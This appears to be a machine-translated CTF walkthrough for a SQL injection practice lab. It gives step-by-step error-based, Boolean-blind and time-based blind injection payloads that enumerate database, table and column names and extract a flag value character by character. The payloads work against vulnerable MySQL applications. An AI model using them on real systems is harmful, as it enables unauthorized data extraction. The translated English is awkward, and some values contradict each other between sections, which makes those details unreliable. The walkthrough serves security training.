SQL manual blind injection and error reporting injection

An error injection

Guess the length of the field

3 Report errors

2 Don't complain , There are two fields in this table

updatexml An error injection

adopt updatexml() Function to inject
updatexml（） Is responsible for modifying the queried content
UPDATEXML (XML_document, XPath_string, new_value);

• The first parameter ：XML_document yes String Format , by XML The name of the document object ,XML The content of .
• The second parameter ：XPath_string (Xpath Format string ) , Is the need to update The location of XPATH route .
• The third parameter ：new_value,String Format , Updated content

among ：1,3 placeholder , To satisfy updatexml Function format ,concat The parameters after the function connection ,0x21 It's hexadecimal ！,database The function is to read the library name where the current table is located .

?id=1 union select updatexml(1,concat(0x21,(select database()),0x21),3)

Take... From the view sqli The table name under the Library

?id=1 union select updatexml(1,concat(0x21,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x21),3)

By database name , Table name , check flag The values in the table

?id=1 union select updatexml(1,concat(0x21,(select * from sqli.flag),0x21),3)

extractvalue An error injection

adopt extractvalue Function to save and inject
Format ：EXTRACTVALUE (XML_document, XPath_string);

Construction injection reads the current database name

And then through sql View fetch sqli The table name under the Library

?id='1' union select extractvalue(1,concat(0x21,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x21))

Finally, through the read database name and table name , Read the values

?id='1' union select extractvalue(1,concat(0x21,(select * from sqli.flag),0x21))

Boolean Injection

Guess the length and name of the database

adopt length Function to read the current database length

length 4

?id=1 and (select length(database())=4)

Use ascii Guess the database name by dichotomy

Greater than ascii 100 by true

?id=1 and ((select ascii(substr(database(),1,1)))>100)

Less than 120 by true, Less than 110 by false

?id=1 and ((select ascii(substr(database(),1,1)))<120)

Finally, try , obtain 115, Corresponding asscii Code for s

?id=1 and ((select ascii(substr(database(),1,1)))=115)

Get the database name in turn sqli

?id=1 and ((select ascii(substr(database(),2,1)))=113) #q
?id=1 and ((select ascii(substr(database(),3,1)))=108) #l
?id=1 and ((select ascii(substr(database(),4,1)))=105) #i

Guess the number of list names and table names

Number

Guess the number of lists = 2 Indicates that there are two lists under the current library

?id=1 and ((select count(table_name) from information_schema.tables where table_schema=database())=2)

The length of the list name

Guess the length of the top name , obtain 4
The second table , The length of the table name is also 4

?id=1 and (select length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=4)

?id=1 and (select length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=4) #  The second table , The length of the table name is also  4

Guess the name of the watch

Guess the first character of the list name is f

?id=1 and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=102)

The second character is 108 Corresponding l
The third character is 97 Corresponding a
The fourth character is 103 Corresponding g

According to the length 4, Finally, the table name is flag

?id=1 and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=108) #  Corresponding  l
?id=1 and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=97) #  Corresponding  a
?id=1 and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=103) #  Corresponding  g

The second table ：
news

?id=1 and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=110) # n
?id=1 and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=101) # e
?id=1 and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))=119) # w
?id=1 and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))=115) # s

Organize information and logic

1. database ： The current library name is 4, The library is sqli
2. list ： The number of lists is 2, The length of list names is 4, One of the lists is called flag, For another news

Guess the number of fields in the list

?id=1 and ((select count(column_name) from information_schema.columns where table_name='flag')=0)

Guess the field length and field name

length
Guess the length of the solution field ,4 Express flag The length of the first field in this list is 4

?id=1 and (select length(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),1))=4)

flag The first field of the table is named flag

?id=1 and (select ascii(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),1,1))=102) # f
?id=1 and (select ascii(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),2,1))=108) # l 
?id=1 and (select ascii(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),3,1))=97) # a
?id=1 and (select ascii(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),4,1))=103) # g

Organize information and logic

1. database ： The current library name is 4, The library is sqli
2. list ： The number of lists is 2, The length of list names is 4, One of the lists is called flag, For another news
3. flag The table has a field name , The field name is also flag

field value

The first character is c

?id=1 and (select ascii(substr((select flag from flag limit 0,1),1,1))=99) # c
?id=1 and (select ascii(substr((select flag from flag limit 0,1),2,1))=116) # t
?id=1 and (select ascii(substr((select flag from flag limit 0,1),3,1))=102) # f
?id=1 and (select ascii(substr((select flag from flag limit 0,1),4,1))=104) # h
 wait .......

summary

Familiar with related functions

ascii(str)：str Is a string parameter , The return value is the leftmost character ascii code . Through it , We can determine the specific characters .
substr(str,start,len)： This function takes str From the subscript start At the beginning , The length is len String . It is usually used to extract a single character in blind annotation , hand ascii Function to determine its specific value .
length(str)： This function is used to get str The length of the . Only in this way can we know that we need to pass substr Which subscript .
count([column])： You should be familiar with this function , Used to count the number of records , It is in blind injection , It is mainly used to judge the number of records that meet the conditions , And crack them one by one .
limit m,n： among m The beginning of the record index, from 0 Start , Indicates the first record n From the first m+1 Bar start , take n strip 

Manual Boolean blind injection process

1. Guess the current database length , Then the database name .
2. Guess the number of lists in the current database , length , List name .
3. Guess the length of the field name of the useful list , Field name .
4. By database name , List name , Search data by field name .

Time blind note

Guess the length and name of the database

View browser , Eliminate the network reasons , If seconds refresh , You guessed right , If the browser keeps loading , Say, execute sleep function , It's delayed 5 second .

The length of the current database name is 4

?id=1 and if (length(database())=4,1,sleep(5))

Guess that the current database name is sqli

?id=1 and if (ascii(substr(database(),1,1))=115,sleep(3),1) # s
?id=1 and if (ascii(substr(database(),2,1))=113,sleep(3),1) # q
?id=1 and if (ascii(substr(database(),3,1))=108,sleep(3),1) # l
?id=1 and if (ascii(substr(database(),4,1))=105,sleep(3),1) # i

Guess the number of list names and table names

Number of lists
Guess sqli There are two tables under the Library

?id=1 and if(((select count(table_name) from information_schema.tables where table_schema=database())=2),sleep(4),0);

List name length
Guess the length of the first and second tables are 4

?id=1 and if((select length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=4),sleep(5),0) #  The length of the first table 
?id=1 and if((select length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=4),sleep(5),0) #  The length of the second table 

List name
Get the list name flag

?id=1 and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=102),sleep(5),0) #  Corresponding  f
?id=1 and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=108),sleep(5),0) #  Corresponding  l
?id=1 and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=97),sleep(5),0) #  Corresponding  a
?id=1 and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=103),sleep(5),0) #  Corresponding  g

The second table name news

?id=1 and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=110),sleep(5),0) # n
?id=1 and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=101),sleep(5),0) # e
?id=1 and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))=119),sleep(5),0) # w
?id=1 and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))=115),sleep(5),0) # s

Guess the number of fields in the list

Number of fields
flag The list has only one field , and news The list has 3 A field

?id=1 and if(((select count(column_name) from information_schema.columns where table_name='flag')=1),sleep(5),0)
?id=1 and if(((select count(column_name) from information_schema.columns where table_name='news')=3),sleep(5),0)

Guess the length of the field name and the field name

The length is 4

?id=1 and if((select length(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),1))=4),sleep(5),1)

Field name flag

?id=1 and if((select ascii(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),1,1))=102),sleep(5),1) # f
?id=1 and if((select ascii(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),2,1))=108),sleep(5),1) # l 
?id=1 and if((select ascii(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),3,1))=97),sleep(5),1) # a
?id=1 and if((select ascii(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),4,1))=103),sleep(5),1) # g

field value

?id=1 and if((select ascii(substr((select flag from flag limit 0,1),1,1))=116),sleep(5),1) # t
?id=1 and if((select ascii(substr((select flag from flag limit 0,1),2,1))=101),sleep(5),1) # e
?id=1 and if((select ascii(substr((select flag from flag limit 0,1),3,1))=115),sleep(5),1) # s
......

verification

summary

1. Familiar with trinocular operation , Global injection and Boolean injection types , Pay attention to the corresponding delay of the browser , Use dichotomy .

Source code

ctfhub-sql Inject source code

https://github.com/wpsec/sql-injection-practice